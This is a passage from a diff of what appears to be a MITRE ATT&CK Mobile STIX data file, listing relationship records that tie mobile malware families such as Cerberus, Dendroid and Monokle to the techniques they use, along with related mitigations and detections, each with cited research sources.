+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Cerberus](https://attack.mitre.org/software/S0480) communicates with the C2 using HTTP requests over port 8888.(Citation: CheckPoint Cerberus)", + "modified": "2022-04-20T16:37:46.192Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "target_ref": "attack-pattern--948a447c-d783-4ba0-8516-a64140fcacd5", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--bc4e848a-adb7-40a2-94a1-d5ab9854ff0f", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Zscaler-SpyNote", + "description": "Shivang Desai. (2017, January 23). SpyNote RAT posing as Netflix app. 
Retrieved January 26, 2017.", + "url": "https://www.zscaler.com/blogs/research/spynote-rat-posing-netflix-app" + } + ], + "modified": "2019-10-10T15:24:09.378Z", + "description": "[SpyNote RAT](https://attack.mitre.org/software/S0305) can copy files from the device to the C2 server.(Citation: Zscaler-SpyNote)", + "relationship_type": "uses", + "source_ref": "malware--20dbaf05-59b8-4dc6-8777-0b17f4553a23", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--66c7fdcf-b9ef-429e-81b2-e97e971cfb42", + "type": "relationship", + "created": "2020-11-10T17:08:35.593Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." 
+ } + ], + "modified": "2020-11-10T17:08:35.593Z", + "description": "[CarbonSteal](https://attack.mitre.org/software/S0529) has seen native libraries used in some reported samples (Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--007ebf84-4e14-44c7-a5aa-151d5de85320", + "target_ref": "attack-pattern--52eff1c7-dd30-4121-b762-24ae6fa61bbb", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--cf4243f5-562a-457f-bb15-d45a2047f7ca", + "created": "2019-09-03T19:45:48.510Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019.", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:10:15.827Z", + "description": "[Exodus](https://attack.mitre.org/software/S0405) Two collects a list of nearby base stations.(Citation: SWB Exodus March 2019) ", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--dd818ea5-adf5-41c7-93b5-f3b839a219fb", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e05b61a4-ba8a-4aa5-813b-ad76de5945a8", + "type": "relationship", + "created": "2020-09-24T15:34:51.433Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": 
"Lookout-Dendroid", + "description": "Marc Rogers. (2014, March 6). Dendroid malware can take over your camera, record audio, and sneak into Google Play. Retrieved December 22, 2016.", + "url": "https://blog.lookout.com/blog/2014/03/06/dendroid/" + } + ], + "modified": "2020-09-24T15:34:51.433Z", + "description": "[Dendroid](https://attack.mitre.org/software/S0301) can record audio and outgoing calls.(Citation: Lookout-Dendroid)", + "relationship_type": "uses", + "source_ref": "malware--317a2c10-d489-431e-b6b2-f0251fddc88e", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--09d08f16-9e4d-4279-9a8c-bdda7afdb37d", + "created": "2023-02-06T19:01:08.265Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. 
Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:07:32.636Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) has encoded files, such as exploit binaries, to potentially use during and after the rooting process.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d933bba1-61ab-4fea-b7db-7e2a4f4146e7", + "type": "relationship", + "created": "2020-12-14T15:02:35.230Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Securelist Asacub", + "url": "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/", + "description": "T. Shishkova. (2018, August 28). The rise of mobile banker Asacub. Retrieved December 14, 2020." 
+ } + ], + "modified": "2020-12-14T15:02:35.230Z", + "description": "[Asacub](https://attack.mitre.org/software/S0540) has encrypted C2 communications using Base64-encoded RC4.(Citation: Securelist Asacub)", + "relationship_type": "uses", + "source_ref": "malware--a76b837b-93cc-417d-bf28-c47a6a284fa4", + "target_ref": "attack-pattern--e3b936a4-6321-4172-9114-038a866362ec", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--4e7a1b10-0f68-4a48-a13d-0c7bc13fb819", + "type": "relationship", + "created": "2019-08-07T15:57:13.412Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Kaspersky Riltok June 2019", + "url": "https://securelist.com/mobile-banker-riltok/91374/", + "description": "Tatyana Shishkova. (2019, June 25). Riltok mobile Trojan: A banker with global reach. Retrieved August 7, 2019." + } + ], + "modified": "2019-09-15T15:36:42.312Z", + "description": "[Riltok](https://attack.mitre.org/software/S0403) can retrieve a list of installed applications. Installed application names are then checked against an adversary-defined list of targeted applications.(Citation: Kaspersky Riltok June 2019)", + "relationship_type": "uses", + "source_ref": "malware--c0efbaae-9e7d-4716-a92d-68373aac7424", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--edfb68d0-5efd-4fb5-93f9-c432535686cb", + "created": "2019-09-04T15:38:56.881Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CyberMerchants-FlexiSpy", + "description": "Actis B. (2017, April 22). 
FlexSpy Application Analysis. Retrieved September 4, 2019.", + "url": "http://www.cybermerchantsofdeath.com/blog/2017/04/22/FlexiSpy.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:56:00.761Z", + "description": "[FlexiSpy](https://attack.mitre.org/software/S0408) can collect device contacts.(Citation: CyberMerchants-FlexiSpy)", + "relationship_type": "uses", + "source_ref": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--fb62afa9-d593-44f8-840d-bd5c595a1228", + "created": "2022-04-01T18:44:46.780Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "An EMM/MDM can use the Android `DevicePolicyManager.setPermittedAccessibilityServices` method to set an explicit list of applications that are allowed to use Android's accessibility features.", + "modified": "2022-04-01T18:44:46.780Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "target_ref": "attack-pattern--dc01774a-d1c1-45fb-b506-0a5d1d6593d9", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f857935b-653a-4b9a-a2dc-59c042059a39", + "created": "2023-03-20T15:56:04.673Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:56:04.673Z", + 
"description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0", + "target_ref": "attack-pattern--986f80f7-ff0e-4f48-87bd-0394814bbce5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--eb6dbe2a-6f76-4bce-ab37-66ec67148041", + "type": "relationship", + "created": "2017-10-25T14:48:53.742Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2020-06-24T15:08:18.481Z", + "description": "Enterprise policies should prevent enabling USB debugging on Android devices unless specifically needed (e.g., if the device is used for application development).", + "relationship_type": "mitigates", + "source_ref": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "target_ref": "attack-pattern--667e5707-3843-4da8-bd34-88b922526f0d", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--455b1287-5784-42b4-91fb-01dac007758d", + "created": "2020-09-29T13:24:15.234Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Lookout-Dendroid", + "url": "https://blog.lookout.com/blog/2014/03/06/dendroid/", + "description": "Marc Rogers. (2014, March 6). Dendroid malware can take over your camera, record audio, and sneak into Google Play. Retrieved December 22, 2016." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Dendroid](https://attack.mitre.org/software/S0301) can open a dialog box to ask the user for passwords.(Citation: Lookout-Dendroid)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--317a2c10-d489-431e-b6b2-f0251fddc88e", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e7b7e813-4867-46fe-bf86-6f367553d765", + "type": "relationship", + "created": "2019-11-21T16:42:48.456Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "GReAT. (2019, June 26). ViceLeaker Operation: mobile espionage targeting Middle East. Retrieved November 21, 2019.", + "url": "https://securelist.com/fanning-the-flames-viceleaker-operation/90877/", + "source_name": "SecureList - ViceLeaker 2019" + }, + { + "source_name": "Bitdefender - Triout 2018", + "url": "https://labs.bitdefender.com/2018/08/triout-spyware-framework-for-android-with-extensive-surveillance-capabilities/", + "description": "L. Arsene, C. Ochinca. (2018, August 20). Triout – Spyware Framework for Android with Extensive Surveillance Capabilities. Retrieved January 21, 2020." 
+ } + ], + "modified": "2020-01-21T14:20:50.455Z", + "description": "[ViceLeaker](https://attack.mitre.org/software/S0418) can copy arbitrary files from the device to the C2 server, can exfiltrate browsing history, can exfiltrate the SD card structure, and can exfiltrate pictures as the user takes them.(Citation: SecureList - ViceLeaker 2019)(Citation: Bitdefender - Triout 2018)", + "relationship_type": "uses", + "source_ref": "malware--6fcaf9b0-b509-4644-9f93-556222c81ed2", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--aa40d01f-0741-4bf2-bacd-75e1f3a77af0", + "created": "2022-04-01T16:52:03.322Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-01T16:52:03.322Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--9c049d7b-c92a-4733-9381-27e2bd2ccadc", + "target_ref": "attack-pattern--08ea902d-ecb5-47ed-a453-2798057bb2d3", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--950e1476-83ca-4e81-b542-c91a19b206d7", + "type": "relationship", + "created": "2020-04-24T17:46:31.466Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecurityIntelligence TrickMo", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/", + "description": "P. Asinovsky. (2020, March 24). 
TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. Retrieved April 24, 2020." + } + ], + "modified": "2020-04-24T17:46:31.466Z", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) can collect device information such as network operator, model, brand, and OS version.(Citation: SecurityIntelligence TrickMo)", + "relationship_type": "uses", + "source_ref": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ad0c873b-9e45-44e0-adaf-529921ee7a77", + "type": "relationship", + "created": "2020-06-26T15:32:25.035Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Threat Fabric Cerberus", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html", + "description": "Threat Fabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved June 26, 2020." + }, + { + "source_name": "CheckPoint Cerberus", + "url": "https://research.checkpoint.com/2020/mobile-as-attack-vector-using-mdm/", + "description": "A. Hazum, B. Melnykov, C. Efrati, D. Golubenko, I. Wernik, L. Kuperman, O. Mana. (2020, April 29). First seen in the wild – Malware uses Corporate MDM as attack vector. Retrieved June 26, 2020." 
+ } + ], + "modified": "2020-06-26T15:32:25.035Z", + "description": "[Cerberus](https://attack.mitre.org/software/S0480) can collect device information, such as the default SMS app and device locale.(Citation: Threat Fabric Cerberus)(Citation: CheckPoint Cerberus)", + "relationship_type": "uses", + "source_ref": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--81e1311e-4fe1-4177-ae12-1d50037c5e4f", + "created": "2020-06-02T14:32:31.906Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Volexity Insomnia", + "url": "https://www.volexity.com/blog/2020/04/21/evil-eye-threat-actor-resurfaces-with-ios-exploit-and-updated-implant/", + "description": "A. Case, D. Lassalle, M. Meltzer, S. Koessel, et al.. (2020, April 21). Evil Eye Threat Actor Resurfaces with iOS Exploit and Updated Implant. Retrieved June 2, 2020." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) has communicated with the C2 using HTTPS requests over ports 43111, 43223, and 43773.(Citation: Volexity Insomnia)", + "modified": "2022-04-20T16:40:05.898Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "target_ref": "attack-pattern--948a447c-d783-4ba0-8516-a64140fcacd5", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3f2daf2e-c28c-46cd-bf91-ae35e873f365", + "created": "2019-09-04T14:28:15.950Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-Monokle", + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. 
Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:35:59.273Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) can delete arbitrary files on the device, and can also uninstall itself and clean up staging files.(Citation: Lookout-Monokle)", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--42536c96-ae61-41ab-a1bf-3e7d126a4000", + "created": "2022-03-30T15:13:42.462Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T15:13:42.462Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--c6e17ca2-08b5-4379-9786-89bd05241831", + "target_ref": "attack-pattern--670a4d75-103b-4b14-8a9e-4652fa795edd", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--694857ba-92e8-462e-8900-a9f6fdcf495d", + "type": "relationship", + "created": "2020-12-31T18:25:05.133Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CYBERWARCON CHEMISTGAMES", + "url": 
"https://www.youtube.com/watch?v=xoNSbm1aX_w", + "description": "B. Leonard, N. Mehta. (2019, November 21). The Secret Life of Sandworms. Retrieved December 31, 2020." + } + ], + "modified": "2020-12-31T18:25:05.133Z", + "description": "[CHEMISTGAMES](https://attack.mitre.org/software/S0555) has encrypted its DEX payload.(Citation: CYBERWARCON CHEMISTGAMES)", + "relationship_type": "uses", + "source_ref": "malware--a0d774e4-bafc-4292-8651-3ec899391341", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--4943cca6-69b1-4565-ac09-87ebda04584c", + "created": "2022-04-01T18:52:02.211Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be taught the dangers of rooting or jailbreaking their device.", + "modified": "2022-04-01T18:52:02.211Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0b1aae4b-4dcd-41b6-a708-1441e5a24070", + "created": "2022-04-15T17:18:44.185Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Talos Gustuff Apr 2019", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . Retrieved September 3, 2019." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Gustuff](https://attack.mitre.org/software/S0406) obfuscated command information using a custom base85-based encoding.(Citation: Talos Gustuff Apr 2019)", + "modified": "2022-04-15T17:18:44.185Z", + "relationship_type": "uses", + "source_ref": "malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--bc0d2cbb-30fa-40e6-a250-bf6e5d8f9005", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Kaspersky-Skygofree", + "url": "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/", + "description": "Nikita Buchka and Alexey Firsh. (2018, January 16). Skygofree: Following in the footsteps of HackingTeam. Retrieved September 24, 2018." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Skygofree](https://attack.mitre.org/software/S0327) can be controlled via binary SMS.(Citation: Kaspersky-Skygofree)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--3a913bac-4fae-4d0e-bca8-cae452f1599b", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2908f0f6-2408-41a1-aaab-cf3e7db06aad", + "created": "2020-12-24T21:55:56.752Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. 
Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:26:16.282Z", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) has used exploits to root devices and install additional malware on the system partition.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "target_ref": "attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5c447471-2b97-4d96-b75f-1cbb574b39cf", + "created": "2023-03-20T15:46:49.646Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:46:49.646Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--cc6e0637-76d2-4af3-a604-9d8d3ff8a6b3", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--aaf55dd1-33df-4f02-8025-eaae01f30b33", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-EnterpriseApps", + "description": "Lookout. (2016, May 25). 5 active mobile threats spoofing enterprise apps. 
Retrieved December 19, 2016.", + "url": "https://blog.lookout.com/blog/2016/05/25/spoofed-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:53:38.161Z", + "description": "[AndroRAT](https://attack.mitre.org/software/S0292) collects contact list information.(Citation: Lookout-EnterpriseApps)", + "relationship_type": "uses", + "source_ref": "malware--a3dad2be-ce62-4440-953b-00fbce7aba93", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--82f12052-783e-40e4-8079-d9c030c310fd", + "created": "2022-03-30T20:08:40.223Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android and iOS include system partition integrity mechanisms that could detect unauthorized modifications. ", + "modified": "2022-03-30T20:08:40.223Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7b1cf46f-784b-405a-a8dd-4624c19d8321", + "target_ref": 